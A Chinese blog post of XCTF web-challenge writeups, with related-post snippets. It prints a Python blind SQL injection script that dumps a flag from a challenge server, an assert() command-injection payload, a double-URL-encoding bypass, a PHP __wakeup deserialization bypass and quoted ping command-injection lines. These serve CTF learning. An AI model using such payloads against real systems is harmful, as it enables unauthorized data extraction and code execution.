XCTF攻防世界进阶区writeup(1-5)

最新推荐文章于 2023-02-08 18:04:36 发布
原创 最新推荐文章于 2023-02-08 18:04:36 发布 · 1.3k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文深入解析六项CTF挑战,涵盖SQL注入、PHP漏洞利用、JS逆向、PHP二次编码绕过等技术,通过实战案例展示渗透测试技巧。

1. isc-06
进入题目后看到url后存在参数id,尝试各种注入方式后均无果,使用bp对id参数进行爆破后得到flag。
2.NewsCenter
对search参数进行bool类型的盲注

import requests
s=requests.session()
url="http://111.198.29.45:38153/index.php"
key=''
for i in range(1,40):
    print("正在尝试",i)
    for j in range(37,127):
        #code="-1' or ascii(substr((select table_name from information_schema.tables where table_schema=database()limit 1,1),"+str(i)+",1))="+str(j)+"#"
        #code="-1' or ascii(substr((select column_name from information_schema.columns where table_name='secret_table'limit 1,1),"+str(i)+",1))="+str(j)+"#"
        code="-1' or ascii(substr((select fl4g from secret_table limit 0,1),"+str(i)+",1))="+str(j)+"#"
        payload={"search":code}
        c=s.post(url,data=payload)
        if 'Hello' in c.text:
            key=key+chr(j)
            print(key)
            break

3.mfw
总感觉在哪里做过…
利用githack获得网站源码,再结合index.php当中的漏洞语句assert("file_exists('$file')") or die("That file doesn't exist!");构造')提前对file_exists函数闭合后实现任意命令执行
payload:?page=') or system("cat templates/flag.php");%23得到flag
在这里插入图片描述
4.NaNNaNNaNNaN-Batman
在这里插入图片描述下载附件后得到了一段js文件,修改后缀为html后放入浏览器中执行
在这里插入图片描述
依旧是一段乱码,观察其中的结构发现脚本先定义了一个名为_的变量,其中是定义的一个函数但具体内容由于乱码的问题还是不由得知,最后使用eval方式进行调用,生成了一个输入框。乱码的问题如何解决呢,查阅了网上的相关writeup得知出现乱码问题的关键就在于语句中的eval()函数并不会执行函数而只会执行标签中的内容,如果我们想要看到function函数中的内容,我们就要将eval修改为alert,让整个_中的内容不被执行而仅返回代码。
在这里插入图片描述
得到获得flag的关键语句

e.length==16
e.match(/^be0f23/)!=null
e.match(/233ac/)!=null
e.match(/e98aa$/)!=null
e.match(/c7be9/)!=null

也就是说我们变量e的长度需要是16,开头需要匹配到be0f23(^),结尾需要匹配到e98aa($),但是我们需要匹配到的四个长度为6的字符串,和长度为16不匹配。
此时我们可以发现四个分组的开头和结尾存在有重合的部分,因此可以构造e=be0f233ac7be98aa,刚好符合上述的五个条件。
提交后得到flag
5.PHP2
在这里插入图片描述
先扫描一下后台,得到index.phps
在这里插入图片描述
利用url二次编码进行绕过得到flag
payload:http://111.198.29.45:49512/index.php?id=a%25%36%34min
6.unserialize3
在这里插入图片描述
魔术方法wake_up会在类反序列化的时候调用,因此会直接退出进程,当序列化字符串表示对象属性个数的值大于真实个数的属性就会跳过__wakeup的执行,因此采用修改整个属性个数值的方法进行绕过。
先构造一个正常的xctf类的对象:O:4:"xctf":1:{s:4:"flag";s:3:"111";},再修改属性的个数:O:4:"xctf":2:{s:4:"flag";s:3:"111";},最后以get方式传入的到flag。

GAPPPPP
关注
攻防世界高手进阶 ——Welpwn
weixin_62675330的博客
03-21 1241
攻防世界高手进阶 ——Welpwn 分析文件 checksec分析 coke@ubuntu:~/桌面/CTFworkstation/OADW/welpwn$ checksec welpwn [*] '/home/coke/桌面/CTFworkstation/OADW/welpwn/welpwn' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX e
攻防世界SignIn-writeup
crow\a的博客
02-12 754
(3)为elf文件,在linux环境下运行,不知道flag为啥,随便输一串,结果为GG!(5)按键盘上f5键(有的电脑同时按住f5与fn键)得到对应c语言伪代码。故加密后的v6=v7=M,即密文(16进制),v5=e,即公钥(10进制),v4=n,即模数。即v9=M=suctf{Pwn_@_hundred_years};所以flag为suctf{Pwn_@_hundred_years}(1)下载题,解压(推荐winrar,7-zip解压))得p,q----->得d------>得C。
攻防世界ctf题目easyupload做题笔记。
qq_56426046的博客
08-27 5591
攻防世界ctf题目easyupload做题笔记。
攻防世界writeup
飞鱼的企鹅的博客
01-04 945
攻防世界 confusion1 第一次接触这样的漏洞,认真学习了一波 0x00题目介绍 打开是一个网站,有登陆注册功能,正中间还有一张图片(后来才知道代表php vs python) 但是点击登陆注册都显示404,就很迷了,之后又去扫描了网站,并没有发现什么有用的东西 偶然间查看页面源代码,发现了端倪 这个404界面暗藏玄机啊!但还是不知道怎么做这道题 0xo1查阅资料 其实就是查看wp…...
攻防世界Reverse进阶-re1-100-writeup
y4ung
09-24 1020
1. 介绍 本题是xctf攻防世界中Reverse的进阶的题re1-100 2. 分析 $ file RE100 RE100: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=94dd59e952c54304bd14f282695ae62c4f6c
攻防世界Reverse进阶-Guess-the-Number-writeup
y4ung
09-21 1021
1. 介绍 本题是xctf攻防世界中Reverse的进阶的题Guess-the-Number 题目来源: su-ctf-quals-2014 题目描述:猜个数字然后找到flag. 2. 分析 文件下载下来是一个jar包。在 http://java-decompiler.github.io/ 下载jd-gui,下载下来双击运行即可,免安装。 代码如下,读取用户输入的数字保存到guess_number,只有当my_number / 5 == guess_num
攻防世界Reverse进阶-Shuffle-writeup
y4ung
09-19 648
1. 介绍 本题是xctf攻防世界中Reverse的进阶的题Shuffle 题目来源:SECCON-CTF-2014 题目描述:找到字符串在随机化之前 2. 分析 Linux下的32位可执行文件 $ file c792c7d80be7404ca9789da97406d2ad c792c7d80be7404ca9789da97406d2ad: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, inter
攻防世界Reverse进阶-666-writeup
y4ung
11-13 1737
1. 介绍 本题是xctf攻防世界中Reverse的进阶的题666 题目来源: 2019_UNCTF 2. 分析 $ file 666 666: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=eaed290e5801a19d53e8597ac1a04
xctf攻防世界 REVERSE 高手进阶 easyRE1
热门推荐
l8947943的博客
04-07 1万+
0x01. 进入环境,下载附件 给出了压缩包,解压出一个easy-32和easy-64位文件,使用exeinfo PE打开查看是否加壳,均未加壳,两个文件分别为32位和64位文件。 尝试直接使用IDA32位和IDA64位分别打开两个文件,找到main函数,F5进行反编译,得到反编译代码为: int __cdecl main(int argc, const char **argv, const char **envp) { char s; // [esp+1Ch] [ebp-10Ch] unsigne
攻防世界Web练习Writeup
weixin_42831646的博客
11-07 3564
一些工具 burpsuite SwitchyOmega:Chrome用的代理插件 view_source flag: cyberpeace{c0bffec917b3e51ebf26546ac2c88e79} Writeup 这个题打开之后右键没有反应,直接F12 robots flag: cyberpeace{829baa53f19972442c21944e8205697f} 首先介绍一下Robots是做什么的 Robots简介 1 什么是robots协议? robots协议也叫robots.txt(统一
XCTF(攻防世界)进阶web题Write Up()
Lemon's blog
08-20 1941
前言:这段时间做了一些XCTF的web进阶题,真的是学习到了很多知识,就来总结一下。 Cat 一开始以为是命令注入,恰好最近学习了命令注入,就先来测试一下: 输入127.0.0.1,发现是可以ping通的 输入127.0.0.1 | phpinfo()127.0.0.1 & net user就会显示: Invalid URL 看来命令注入的方法是行不通的(其他连接符也被过滤了,如...
攻防世界web进阶 攻略
weixin_46329549的博客
03-22 725
进阶题前言:**1.isc-06**2.php23.baby_web**4.php-rce** 前言: web进阶题目相对于新手较难,此博客只是记录了一些比较重要或者 有代表性的题目,比较难的题暂时不会解,以后还会有补充。 1.isc-06 这道题用到了对id参数进行爆破。进入题目后看到url后存在参数id,使用各种注入方式后均没有爆破成功,最后使用bp对id参数进行爆破 进入报表中心,看到...
攻防世界-入门12-Writeup
weixin_47848880的博客
02-08 696
攻防世界入门Writeup
WriteUp-攻防世界-MISC Become_a_Rockstar
weixin_57806437的博客
05-27 1316
附件为Become_a_Rockstar.rock Leonard Adleman says star Problem Makers is Problem Makers Problem Makers says NCTF{ God takes World A boy says flag The boy is Bob Evil takes your mind A girl says no flag The girl is Alice Truths were ctf hoster violently F
攻防世界】web练习write up
GZWZ_的博客
04-02 1163
虽然我立志成为一名优秀的web手,但真的好难,九敏!!!求一位志同道合的web小伙伴,一起讨论,一起进步哇!(大佬也没事,求带!!)
攻防世界WEB部分write up
克格莫(有需要的私信)
02-10 334
新手入门1.command_execution 小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。 wp: 输入127.0.0.1;ls,发现可执行后面的ls,故直接用find命令查找:127.0.0.1;find / -name '*flag*' 看到/home/flag.txt ,于是输入:127.0.0.1;cat /home/flag.tx...
攻防世界writeup——Web(持续更新)
Lethe's Blog
08-12 8602
lottery(XCTF 4th-QCTF-2018) 打开题目先注册,然后发现flag可以购买。但得先去买彩票赢得足够的钱,七位数字的彩票,猜中的位数越多,赢得的钱越多,因此应该在买彩票这里出了一些漏洞。 1、首先访问目录robots.txt,存在.git泄露。 2、利用工具GitHack,得到网站源码: 3、进行代码审计,问题出现在api.php里的buy函数,这个函数就是用来判断是否猜...
攻防世界String Writeup
只影的博客
03-04 2457
这道题暂且认为是攻防世界pwn新手比较难的一道题,而难点主要在于读懂题目,读懂后就比较简单了。 查看程序的防御机制,发现除了PIE全开。从题目string可猜测,应该是个格式化字符串的漏洞。可以在Linux中先将程序跑一遍,对程序的流程和分支有个大概了解,本题是个简单的D&D类型的游戏题目。 用ida对程序进行分析,顺着程序的流程走,可以看到在sub_400BB9中有printf(&am...
XCTF-WEB进阶-fakebook
最新发布
02-28
### XCTF WEB进阶 Fakebook 解题报告 #### 源码分析 Fakebook 类似于社交网络平台,在此环境中存在多个功能模块,包括但不限于用户注册、登录以及个人信息管理等功能。通过查看源代码发现,该应用可能存在多种安全漏洞。 对于假想的 `fakebook` 平台而言,其核心逻辑通常围绕着用户的会话管理和数据交互展开。假设存在如下简化版 PHP 伪代码表示部分关键业务流程: ```php <?php class User { public $username; public $password; function login($input_username, $input_password){ // 存在一个潜在的安全隐患:未对输入做严格验证 if ($this->username === $input_username && md5($input_password) === $this->password){ $_SESSION['logged_in'] = true; return "Login successful"; } return "Invalid credentials"; } } ?> ``` 上述代码片段展示了用户认证过程中可能存在的安全隐患——使用弱哈希算法 MD5 对密码进行了处理[^1]。 #### 安全问题剖析 基于以上描述可以推测出几个主要攻击面: - **弱哈希函数**:MD5 已经被证明不再适合用于保护敏感信息,因为它容易受到碰撞攻击的影响。 - **缺乏输入过滤机制**:未能有效防止恶意字符进入系统内部,这可能导致 SQL 注入或其他类型的注入攻击发生。 - **不恰当的错误消息返回**:当用户名或密码错误时给出的具体提示可能会帮助攻击者缩小猜测范围。 #### 利用技巧 针对这些弱点,参赛选手可以从以下几个方面入手尝试突破并解决问题: - 尝试暴力破解或者彩虹表查找已知 MD5 值对应的原始字符串; - 测试是否存在其他形式的数据注入风险点,比如 URL 参数、POST 请求体内的字段等位置; - 探索是否有任何地方暴露出过多调试信息给外部访问者利用; 成功完成挑战后一般可以获得 flag 或者进一步的操作权限作为奖励。 #### 复现过程 为了模拟真实的渗透测试场景,建议按照以下方式构建实验环境来进行练习: 1. 构建一个类似的 Web 应用程序框架,确保其中包含了所有必要的组件和服务依赖关系; 2. 实施相应的防护措施来抵御常见的Web 攻击手段,如 XSS 和 CSRF 等; 3. 使用工具辅助自动化执行某些特定任务,例如 Hydra 可以用来实施字典攻击尝试登陆接口; 4. 记录每一步操作细节以便后续总结经验教训,并分享给社成员共同学习进步。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值